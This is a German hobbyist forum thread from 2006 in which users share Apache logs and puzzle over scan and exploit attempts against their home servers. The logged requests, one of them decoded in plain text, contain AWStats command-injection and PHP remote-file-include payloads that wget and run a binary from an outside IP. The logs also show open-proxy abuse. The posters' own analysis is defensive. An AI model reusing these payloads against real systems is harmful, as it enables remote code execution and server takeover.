kostenloser Webspace werbefrei: lima-city

localhost logs

lima-cityForumSonstigesSpam und sonstiges Unvergütetes

ahnung anfragen attacke beitrag client configuration dsen einstellung error folgende eintrag gecko log lokal not option pipe rhrer sprache statistik window
  1. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    19:49, 2.1.2006
    Ich hab heute Lokal mal den Webalizer getestet. Dabei ist mir aufgefallen, dass des ?fteren versucht wird von extern auf mein Rechner zuzugreifen. Aber noch interessanter sind diese eintragungen in der access.log:
    211.90.162.130 - - [09/Dec/2005:18:41:46 +0100] "CONNECT 65.54.190.179:25 HTTP/1.1" 403 365 "-" "-"

    211.90.162.130 - - [09/Dec/2005:18:41:47 +0100] "GET http://www.ebay.com/ HTTP/1.1" 403 364 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

    66.34.225.186 - - [18/Dec/2005:18:52:47 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 403 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

    66.34.225.186 - - [18/Dec/2005:18:52:52 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 403 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


    Jemand ne Ahnung, was das bedeutet? Ich meine ich bin doch nicht ebay!

  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. alopex

    Kostenloser Webspace von alopex

    alopex hat kostenlosen Webspace.

    19:55, 2.1.2006
    Die "EBay-Anfrage" d?rfte dadurch zu Stande gekommen sein, dass jemand

    http://phatteks.homepage.de/http://www.ebay.com in die Adresszeile seines Browser getippt hat. Falls das nicht gehen sollte, hat er es mit einem Browser-Simulations-Tool geschickt (wget, Perl::LWP, ...).

    Auch der folgende Eintrag sieht so aus, als ob sich jemand von au?en an deinen Statistiken zu schaffen machen wollte oder eine Sicherheitsl?cke getestet hat.

  4. lucas9991

    Kostenloser Webspace von lucas9991

    lucas9991 hat kostenlosen Webspace.

    19:58, 2.1.2006
    Ich vermute mal, dass jemand versucht hat deine FTP Einstellungen zu ?berschreiben.
    Auf jeden Fall scheint der jemand Ahnung davon zu haben.
    Du solltest sicherheitshalber mal deine TP einstellungen nachschauen und deine Passw?rter ?ndern.

    MfG Lucas
  5. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    20:01, 2.1.2006
    @alopex: Wenn dass jemand so eingetippt h?tte, w?re noch ein Slash vorne dran:
    127.0.0.1 - - [02/Jan/2006:19:58:26 +0100] "GET /http://www.ebay.com HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1"

    Naja, ich habe gar keinen ftp-Server installiert. Das ist ja nur mein ganz normaler Rechner.

  6. alopex

    Kostenloser Webspace von alopex

    alopex hat kostenlosen Webspace.

    20:05, 2.1.2006
    Die Anfrage-URL nach der mit ebay.com mal dekodiert:

    /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 216.15.209.12/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

    Die IP-Adressen:
    216.15.209.12 => 123go.ca
    216.102.212.115 => adsl-216-102-212-115.buytheelection.com


    Nur weil der Typ den Pipe-Operator schon mal gesehen hat, hei?t das noch lange nicht, dass er Ahnung hat.^^

    Ich w?rde eher auf eine ?bliche Probier-Attacke eines Script-Kiddies tippen.
  7. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    20:08, 2.1.2006
    Ich frag mich blo?, wieso der durch probieren gerade auf meine IP kommt. Ich hab doch nur Modem und dann geht meine ganze Geschwindigkeit noch an irgendwelche Script-Kiddies ...

  8. alopex

    Kostenloser Webspace von alopex

    alopex hat kostenlosen Webspace.

    20:12, 2.1.2006
    Die klappern einfach automatisiert irgendwelche Adressblocks ab. Irgendwo steht schon ein Server, der drauf reagiert. Deiner d?rfte schon wegen der Antwortgeschwindigkeit nach der ersten Anfrage durchs Raster fallen ...
  9. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    20:14, 2.1.2006
    .. au?erdem kann auf meinen http-Server und auf meinen mysql-server nur lokal zugegriffen werden. aber meinen mailserver m?sste ich mal sch?tzen ...

    p.s. hat jemand ne ahnung wie ich exim4 vor dem zugriff von au?en sch?tzen kann?

    Beitrag ge?ndert am 2.01.2006 20:19 von phattek

  10. tuvok

    tuvok hat kostenlosen Webspace.

    22:34, 2.1.2006
    Der Thread hat mich auf die Idee gebracht auch mal wieder die Logs durchzugehen, da ich das seit Ewigkeiten nicht mehr gemacht hab...

    Aber ein bisschen hat es mich schon erstaunt das ich ziemlich schnell f?ndig werde... sieht irgendwie so aus als h?tte da jemand einfach mal ein paar Sachen ausprobiert ob diese existieren. Gibts da bots oder sowas die einfach irgendwelche ips durchgehen?

    [Mon Jan 02 18:03:00 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/awstats
    [Mon Jan 02 18:03:01 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats.pl
    [Mon Jan 02 18:03:03 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats
    [Mon Jan 02 18:03:04 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:05 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlrpc.php
    [Mon Jan 02 18:03:07 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlsrv/xmlrpc.php
    [Mon Jan 02 18:03:09 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/blogs
    [Mon Jan 02 18:03:10 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/drupal
    [Mon Jan 02 18:03:12 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/phpgroupware
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/wordpress
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:16 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlrpc
    [Mon Jan 02 18:03:17 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlsrv

  11. lucas9991

    Kostenloser Webspace von lucas9991

    lucas9991 hat kostenlosen Webspace.

    23:56, 2.1.2006


    tuvok schrieb:
    Der Thread hat mich auf die Idee gebracht auch mal wieder die Logs durchzugehen, da ich das seit Ewigkeiten nicht mehr gemacht hab...

    Aber ein bisschen hat es mich schon erstaunt das ich ziemlich schnell f?ndig werde... sieht irgendwie so aus als h?tte da jemand einfach mal ein paar Sachen ausprobiert ob diese existieren. Gibts da bots oder sowas die einfach irgendwelche ips durchgehen?

    [Mon Jan 02 18:03:00 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/awstats
    [Mon Jan 02 18:03:01 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats.pl
    [Mon Jan 02 18:03:03 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats
    [Mon Jan 02 18:03:04 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:05 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlrpc.php
    [Mon Jan 02 18:03:07 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlsrv/xmlrpc.php
    [Mon Jan 02 18:03:09 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/blogs
    [Mon Jan 02 18:03:10 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/drupal
    [Mon Jan 02 18:03:12 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/phpgroupware
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/wordpress
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:16 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlrpc
    [Mon Jan 02 18:03:17 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlsrv

    Mit Sicherheit.
    Wahrscheinlich ein Script, dass wie alopex ansprach, einfach einen Adresseblock scannt und bei Servern die auf den Ping anspringen die Dateien abfragt, weil anscheinden bei awstats ein Fehler ist, den man ausnutzen k?nnte.

    MfG Lucas

  12. tuvok

    tuvok hat kostenlosen Webspace.

    0:08, 3.1.2006
    Jo, danke :)
    Bins mal genauer durchgegangen und hab nur solche Sachen gefunden... dabei ist mir aber noch was aufgefallen was ich nicht nachvollziehen kann.

    64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "\x05\x01" 501 288
    64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "CONNECT 64.12.165.56:6666 HTTP/1.0" 405 314
    64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "POST http://64.12.165.56:6666/ HTTP/1.0" 404 287

    und im error log

    [Thu Dec 29 19:15:37 2005] [error] [client 64.12.165.33] Invalid method in request \x05\x01
    [Thu Dec 29 19:15:38 2005] [error] [client 64.12.165.33] Attempt to serve directory: D:/server/www/


    Scheint irgendwas von/mit Icq zu sein
    Apache/1.3.29 Server at irc-m08.icq.aol.com Port 80

  13. r*****r

    0:17, 3.1.2006
    mr sind da auch ein paar eintra??ge aufgefalle, in der log vom janaserver :biggrin: :

    als link, da des immer mehr wurde, was ich gefunden habe:
    http://ruehrer.xardas.lima-city.de/log-jana.txt


    Edit:

    wenn die w?ssten,was alles in den Logfiles auftritt ;)

    Edit 2:
    hm, interresant, sollte man nur noch die sprache beherschen ;):
    http://80.55.67.114/

    Beitrag ge?ndert am 3.01.2006 00:23 von ruehrer

    Beitrag ge?ndert am 3.01.2006 00:29 von ruehrer
  14. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    20:38, 3.1.2006
    ruehrer schrieb:
    Edit 2:
    hm, interresant, sollte man nur noch die sprache beherschen ;):
    http://80.55.67.114/

    Hmmm, ich hab ein Programm, was Totem hei?t:

    Totem 0.100
    Movie Player using xine-lib version 1.0.0
    Copyright ? 2002-2004 Bastien Nocera


    Aber hat hier jemand einen Plan, wie man exim4 so einrichten kann, dass sich Benutzer authentifizieren m?ssen bzw. dass der Host localhost sein muss.

  15. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

lima-city bietet dir kostenlosen und werbefreien Speicherplatz für Deine Homepage. Sofort anmelden und direkt loslegen mit Webspace, PHP, Datenbanken, günstigen Domains und einer tollen Community!

Login zum Webhosting ohne Werbung!

Hast Du schon kostenlosen Webspace oder bist Du auf der Suche nach WordPress-Hosting mit Staging-Funktion und wp-cli? Jetzt günstige Prepaid Domains registrieren!